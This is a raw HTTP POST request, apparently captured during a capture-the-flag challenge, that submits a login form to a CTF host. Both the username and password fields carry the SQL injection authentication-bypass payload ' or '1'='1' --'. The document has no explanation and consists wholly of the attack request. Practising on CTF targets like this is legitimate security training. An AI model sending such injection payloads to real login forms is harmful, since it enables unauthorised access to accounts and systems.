POST /index.php HTTP/1.1
Host: chall.battlectf.online:8087
Content-Length: 264
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://chall.battlectf.online:8087
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary85tAFyEe3TwBYJ6h
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://chall.battlectf.online:8087/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=93b4faf51791608286534a441e45fb55
Connection: close

------WebKitFormBoundary85tAFyEe3TwBYJ6h
Content-Disposition: form-data; name="username"

' or '1'='1' --'
------WebKitFormBoundary85tAFyEe3TwBYJ6h
Content-Disposition: form-data; name="password"

' or '1'='1' --'
------WebKitFormBoundary85tAFyEe3TwBYJ6h--
